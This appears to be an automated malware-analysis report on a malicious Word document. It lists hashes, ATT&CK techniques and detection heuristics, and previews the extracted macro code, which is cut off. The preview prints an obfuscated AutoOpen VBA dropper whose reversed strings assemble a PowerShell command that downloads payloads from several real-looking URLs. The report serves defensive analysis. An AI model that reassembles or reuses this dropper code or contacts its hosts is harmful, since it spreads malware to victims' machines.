Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 466683e66aa128c3…

MALICIOUS

Office (OLE)

Size: 152.5 KB
Created: 2018-05-14 11:10:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: d9fd4f5b1385f9a971d53bc776f407c4
SHA-1: fd839722d2a6f78e76149a091fab423940b2acf4
SHA-256: 466683e66aa128c3a6485a7b60eddff522c8c7da14e42a6643fb194611291455
Risk score: 242

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_AUTOOPEN. The critical OLE_VBA_SHELL firing suggests the macro attempts to execute external code. The SE_PASSWORD_ARCHIVE_LURE heuristic indicates the document likely instructs the user to open a password-protected archive, a common tactic for keeping the payload encrypted until it is past gateway scanning. The Autoopen macro is present and likely initiates the malicious execution chain; the extracted macro source is padded with junk arithmetic and assembles its command from reversed string fragments (for example "ptth" and "raHC[" read backwards as "http" and "[Char"), which is consistent with an obfuscated PowerShell command line.

Heuristics (7)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Agent-6543332-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6543332-0
  • OLE_VBA_MACROS (medium, 2 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
  • SE_PASSWORD_ARCHIVE_LURE (high): Password-protected archive handoff
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that ordinary Office files carry; it is not evidence of outbound network contact.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   123835 bytes
SHA-256: bee0ac40a5e438f2d7f1016d0a647081b9a84268f2fc0a9a1b4fa42a24566b86
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mPkTWCQHoBKZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JlAnis(TwaGZB)
piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662)
JVvsk = BtOii
ahBSzG = qmSXzT
VKclK = 69863
End Sub
Sub EIQVDt(DtaTZ)
Fbzhaw = FUrzzZ + Sgn(52783 - rRcXuI - YlzuN + Fix(57405)) - 75045 - CDbl(86423)
EYjDtK = LNuXkR
YiSWM = zvfakC
kjjMS = 52117
tYpYwj = QKzll + Sgn(14126 - YQvHa - uIsJT + Fix(82131)) - 92913 - CDbl(21708)
dhEJSY = otYjGh
fpwvuL = oErKF
jfFHkK = 70876
RjcpuZ = BjtKNX + Sgn(24722 - UvBAP - dMwMnS + Fix(17274)) - 78280 - CDbl(32373)
vwEOIW = AlonV
ArNTLk = iKVro
dcHGS = 24193
End Sub
Sub zOQSw(woBOa)
HOwVZ = zEENkb + Sgn(24488 - psdsi - aDAlb + Fix(90260)) - 39562 - CDbl(1540)
Xhvuqj = fHhHV
NkipG = VFKIk
aEOMt = 59076
wShfoj = skNWL + Sgn(44741 - SpPHl - vfjMZL + Fix(80939)) - 30515 - CDbl(55005)
SNCcYq = FpIjhk
owNCHO = FIpjRl
FdqGP = 90785
End Sub
Sub Autoopen()
On Error Resume Next
JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178)
dRpvi = SZfGqm
kVWvwc = DwCFiE
CVXwJG = 20549
uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY)
WkJPWj = iPkMZ + Sgn(85819 - EHJjf - JYSBC + Fix(77324)) - 97803 - CDbl(79333)
uFIjT = kOhmaw
hUhTwQ = VwTuD
zSHMi = 64508
End Sub
Sub IUiDt(kTsbt)
ZMqwU = sifAwm + Sgn(28570 - AhSHUE - WoNpda + Fix(44018)) - 62660 - CDbl(80199)
WZodGH = mdqzt
YsoQY = BlGpM
XdIqJ = 40932
pYZMa = tazUrN + Sgn(87898 - fpwoJw - oqQjcb + Fix(67262)) - 56800 - CDbl(22279)
UVzDjw = ORfbDQ
cSZso = BzXXB
JczYKz = 73806
WswZw = RarSCk + Sgn(50866 - HJBqp - uUwaBC + Fix(80062)) - 6125 - CDbl(32070)
UiRrtk = Awwub
EURHI = oWTHm
BtVXtA = 26617
End Sub
Sub wwYSi(XmAur)
SNuFk = jicWAW + Sgn(59277 - rqAdC - jSJFww + Fix(46865)) - 3521 - CDbl(95233)
VZQhM = zQnwTf
bzBoVP = mXstYz
oIlWi = 70422
End Sub

Attribute VB_Name = "BbFzADqkpEd"
Sub lhIuK(mQPzj)
JMkLH = bpvGa + Sgn(40951 - qUMqCh - QXOWfO + Fix(51431)) - 38622 - CDbl(85605)
LDvio = Sicoco
iHnwT = aZNQsH
zOftbH = 93500
End Sub
Function iQfXBvCI()
On Error Resume Next
vXaNCj = LZtLbQ + Sgn(70167 - sPGlS - znCbCq + Fix(9279)) - 98457 - CDbl(67472)
Vrfjk = lRBjN
WhfVNz = iUVifz
XlApoM = 81326
NzoNci = XHuIa + Sgn(93738 - LLsrz - LVvRt + Fix(91494)) - 5209 - CDbl(74700)
NSQmvR = UziqB
lnccFA = LdqWW
sBWUjf = 28159
CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper-  29]raHC[,)87]raHC[+701]raoc", 62186 + 3 - 62186, 62186 + 53 - 62186)
tcroBj = qsNJR + Sgn(26485 - IpQqBi - kbuPNY + Fix(11861)) - 96405 - CDbl(58991)
KnVrLk = DREVld
EUJth = qdkrJ
zYnKz = 84760
wQozC = sDXIWB + Sgn(40934 - XBjEw - PHJKQh + Fix(30984)) - 84329 - CDbl(78644)
SziivT = qGdjJm
vLBQvk = jTmBrH
jVXAOo = 80226
umCtXoj = uJOXwd("ML, CDSH3a;)X'+'6y@X'+'6y(tilpS.X6y/B8V'+'VVJ'+'G/moc.ovoted'+'//:ptth'+'@/HrEUR'+'/moc.'+'eir'+'tsudni-'+'eira//:pt'+'th@/YY3n'+'FS/ed'+'.esie'+'r-nrey'+'ab//'+':ptth@/4E'+'hGM/nijp", 26860 + 5 - 26860, 26860 + 175 - 26860)
WrQDP = zUPFUi + Sgn(29153 - jzwEq - jsdELI + Fix(18797)) - 71447 - CDbl(11571)
vwoYoK = rVAiw
vXcOb = YEKzDr
OMsGiM = 28396
wfwWYd = iJtlX + Sgn(99691 - IqCQF - mLhhN + Fix(3604)) - 85527 - CDbl(27579)
IiRLdk = LqbmY
QaTnI = BPQIc
tkzPIW = 71102
EZMDuTT = uJOXwd("bSited.nesier-anit'+'a//'+':pt'+'th@/Vm'+'TY'+'M3N/'+'zib.mar'+'gtpa//'+':'+'p'+'tth X6y = XCDAH'+'3'+'a;)331282 ,00'+'001'+'('+'txen.d'+'sada'+'s'+'nH3a '+'= BSNH3a;tneilCSP", 63779 + 3 - 63779, 63779 + 168 - 63779)
mBKTLV = IiMpSi + Sgn(26585 - GOathM - rapQkz + Fix(4963)) - 93420 - CDbl(64183)
CimOQ = bmfslD
KRfoq = idDhJ
kivlf = 12249
ziMjB = kVjsQ + Sgn(84936 - bNFhot - PAhbG + Fix(13115)) - 27158 - CDbl(27021)
RiiQCU = mrKXi
VoYXwJ = vVWOw
zAkduH = 42755
rbtTjqasHa = uJOXwd("U7Z%@beW'+'.t'+'eN.m'+'ets'+'yS )X6'+'yt'+'c'+'ejbo-X'+'6y+'+'X'+'6yw'+'X6y+X6yenX'+'6y(. = UYYH3a;m'+'odnar )'+'X'+'6ytX6'+'y'+'+X6kUB", 65407 + 4 - 65407, 
... (truncated)